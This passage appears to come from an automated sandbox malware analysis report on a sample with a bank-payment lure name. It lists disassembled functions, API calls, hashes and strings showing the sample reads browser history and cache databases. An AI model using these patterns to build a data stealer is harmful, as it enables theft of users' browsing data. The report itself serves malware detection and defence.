                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                                                                          • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                          • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                          • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                                          • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02380048), ref: 0044DF01
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02390050), ref: 0044DF11
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00C66E78), ref: 0044DF21
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02390458), ref: 0044DF31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                          • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                          • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E3EC
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1979745280-0
                                                                                                                                                                                                                                          • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                          • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
